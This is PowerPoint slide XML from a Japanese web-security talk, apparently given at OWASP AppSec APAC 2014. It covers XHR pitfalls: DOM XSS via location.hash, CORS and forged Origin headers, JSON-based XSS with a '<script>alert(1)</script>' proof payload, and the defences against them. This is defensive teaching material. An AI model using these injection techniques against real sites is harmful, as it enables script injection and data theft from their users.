              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="3200" dirty="0" smtClean="0"/>
              <a:t>XSS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 smtClean="0"/>
              <a:t>対策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相手先を固定リストで事前に保持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708920"/>
            <a:ext cx="7200800" cy="3416320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// http://example.jp/#/news</a:t>
            </a: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var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page =</a:t>
            </a:r>
            <a:b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</a:b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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>decodeURIComponent</a:t>
            </a:r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( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>location.hash.substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(1)</a:t>
            </a:r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);</a:t>
            </a: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var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pages = { "/news":"/news", "/comment":"/comment"}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;</a:t>
            </a:r>
          </a:p>
          <a:p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var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url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 = pages[ page ] || "/"; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>//undefined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>のときは</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>を取得</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRP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var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= new XMLHttpRequest();</a:t>
            </a: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xhr.open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( "GET",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url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, true );</a:t>
            </a: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xhr.onreadystatechange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= function(){</a:t>
            </a:r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 if(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xhr.readyState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== 4 &amp;&amp;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xhr.status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== 200 ){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     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div.innerHTML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= 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xhr.responseText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 }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60587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XMLHttpRequest</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP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(2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" alt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意図せずクロスオリジン通信</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" alt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→データ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US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漏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" alt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えい</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP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3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XHR: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>意図</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>せずクロスオリジン通信→データ漏えい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サーバ側で意図していないクロスオリジン通信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リクエストヘッダの</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Origin:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>で送信元を確認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827395"/>
            <a:ext cx="7200800" cy="2308324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GET</a:t>
            </a:r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/resource HTTP/1.1</a:t>
            </a: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Host: example.jp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  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Origin: http://example.jp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1600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Content-Type: text/plain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Origin: htp://example.jp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1600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これは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example.jp</a:t>
            </a:r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だけが読むことを許された機密情報です。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2924944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この実装例は</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2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安全？脆弱？</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="20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5171127"/>
            <a:ext cx="7200800" cy="1354217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GET</a:t>
            </a:r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/resource HTTP/1.1</a:t>
            </a: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Host: example.jp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  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Origin: http://another.example.jp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1600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HTTP/1.1 403 Forbidden</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="311426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XHR: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>意図</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>せずクロスオリジン通信→データ漏えい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攻撃者は</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>telnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等で任意の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>を送信可能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Origin:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>ヘッダを認証に使用してはいけない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827395"/>
            <a:ext cx="7200800" cy="2308324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GET</a:t>
            </a:r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/resource HTTP/1.1</a:t>
            </a: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Host: example.jp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  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Origin: http://example.jp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1600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Content-Type: text/plain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Origin: htp://example.jp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1600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これは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example.jp</a:t>
            </a:r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だけが読むことを許された機密情報です。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00192" y="2852936"/>
            <a:ext cx="187220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この実装例は</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2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kumimoji="1" lang="en-US" altLang="ja-JP" sz="2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kumimoji="1" lang="ja-JP" altLang="en-US" sz="2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安全？脆弱？</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0" smtClean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en-US" altLang="ja-JP" sz="20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kumimoji="1" lang="ja-JP" altLang="en-US" sz="20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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC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→脆弱</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC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139952" y="301994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攻撃者</a:t>
            </a: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</a:t>
            </a:r>
            <a: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telnet</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP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で入力</a:t>
            </a:r>
            <a:endParaRPr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kumimoji="1" lang="en-US" altLang="ja-JP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3995936" y="2924944"/>
            <a:ext cx="144016" cy="648072"/>
            <a:chOff x="3995936" y="2924944"/>
            <a:chExt cx="144016" cy="576064"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="9" name="直線コネクタ 8"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3995936" y="2924944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/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4139952" y="2924944"/>
              <a:ext cx="0" cy="5760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/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3995936" y="3501008"/>
              <a:ext cx="14401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716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smtClean="0"/>
              <a:t>XHR: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>意図</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>せずクロスオリジン通信→データ漏えい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通常通り</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>を使って認証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296860"/>
            <a:ext cx="7560840" cy="2800767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GET</a:t>
            </a:r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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rsource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 HTTP/1.1</a:t>
            </a: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Host: example.jp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  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Origin: http://example.jp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  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sessionid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=A1E223ED</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1600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Content-Type: text/plain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  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Origin: http://example.jp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1600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これは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example.jp</a:t>
            </a:r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だけが読むことを許された機密情報です。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1844824"/>
            <a:ext cx="7560840" cy="338554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 err="1" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xhr.withCredentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty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= true;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty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sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>付きでクロスオリジンリクエストを発行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="white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83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XMLHttpRequest</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP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(3)Ajax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" alt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データを使った</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP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XSS</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP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19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XHR: Ajax</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>データを使った</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>XSS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IE must die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204864"/>
            <a:ext cx="7560840" cy="1200329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application/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 charset=utf-8</a:t>
            </a:r>
          </a:p>
          <a:p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{ "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msg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" : "&lt;script&gt;alert(1)&lt;/script&gt;" }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2665" y="3522043"/>
            <a:ext cx="5379858" cy="260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5000"/>
            <a:lum/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect l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46688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 smtClean="0">
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:ln>
              </a:rPr>
              <a:t>提供</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="8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367965" y="0"/>
            <a:ext cx="800219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</p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert" wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pP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66FF3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ＳＯＰを破る</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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超絶技法</a:t>
            </a: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66FF3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が</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="4000" dirty="0">
              <a:ln w="19050" cap="rnd" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:round/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="66FF33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512" y="0"/>
            <a:ext cx="800219" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="64000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert" wrap="square" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pP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66FF3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いよいよ</a:t>
            </a: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FF0066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あきらか</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:ln w="19050" cap="rnd" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:round/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="66FF33"/>
                </a:solidFill>
                <a:latin typeface="HGP創英ﾌﾟﾚｾﾞﾝｽEB" pitchFamily="18" charset="-128"/>
                <a:ea typeface="HGP創英ﾌﾟﾚｾﾞﾝｽEB" pitchFamily="18" charset="-128"/>
              </a:rPr>
              <a:t>になる</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="4000" dirty="0" smtClean="0">
              <a:ln w="19050" cap="rnd" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:round/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="66FF33"/>
              </a:solidFill>
              <a:latin typeface="HGP創英ﾌﾟﾚｾﾞﾝｽEB" pitchFamily="18" charset="-128"/>
              <a:ea typeface="HGP創英ﾌﾟﾚｾﾞﾝｽEB" pitchFamily="18" charset="-128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-4584" y="2492896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  <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4800" dirty="0" smtClean="0">
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:ln>
              </a:rPr>
              <a:t>OWASP Japan</a:t>
            </a:r>
            <a:endParaRPr lang="ja-JP" altLang="en-US" sz="6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3861048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  <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4800" dirty="0" smtClean="0">
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:ln>
              </a:rPr>
              <a:t>Code Blue</a:t>
            </a:r>
            <a:endParaRPr lang="ja-JP" altLang="en-US" sz="6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2965356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  <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0">
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:ln>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" err="1" smtClean="0">
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:ln>
              </a:rPr>
              <a:t>AppSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0">
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:ln>
              </a:rPr>
              <a:t> APAC 2014</a:t>
            </a:r>
            <a:endParaRPr lang="ja-JP" altLang="en-US" sz="48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6854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XHR: Ajax</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>データを使った</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>XSS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JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>ならエスケープできなくはないけど</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>text/plain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>とか</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0"/>
              <a:t>csv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>とかエスケープできない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296860"/>
            <a:ext cx="7715200" cy="1200329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application/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 charset=utf-8</a:t>
            </a:r>
          </a:p>
          <a:p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{ "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msg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" : "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\u003c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script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\u003e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alert(1)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\u003c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/script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\u003e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" }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="271322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XHR: Ajax</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>データを使った</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>XSS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対策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X-Content-Type-Options</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>を付ける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endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>非</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>が</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>扱いされることがなくなる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732727"/>
            <a:ext cx="7560840" cy="1477328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application/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 charset=utf-8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X-Content-Type-Options: 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nosniff</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p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{ "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msg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" : "&lt;script&gt;alert(1)&lt;/script&gt;" }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="273626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XMLHttpRequest</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP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(4)Ajax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US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データ内の機密情報漏えい</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" alt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4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692696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4000" dirty="0" smtClean="0"/>
              <a:t>XHR: Ajax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>データ内の機密情報漏えい</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="40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JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>や</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>VBScript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>として</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>解釈可能な</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Ajax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>データが狙われやすい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6516216" y="3894225"/>
            <a:ext cx="2232248" cy="1152128"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="30000">
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="5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 rot="1201498">
            <a:off x="3627428" y="5216565"/>
            <a:ext cx="2319419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229200"/>
            <a:ext cx="1440160" cy="1262967"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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5484055"/>
            <a:ext cx="554618" cy="570024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4182257"/>
            <a:ext cx="1498488" cy="1498488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill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4309743"/>
            <a:ext cx="1357322" cy="1357322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill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4182257"/>
            <a:ext cx="1100133" cy="1100133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1403648" y="5766433"/>
            <a:ext cx="374441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0000" tIns="180000" rIns="180000" bIns="180000" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="ＭＳ ゴシック" pitchFamily="49" charset="-128"/>
                <a:ea typeface="ＭＳ ゴシック" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>{"from" : "a@example.com"}</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2000" b="1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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="グループ化 86"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
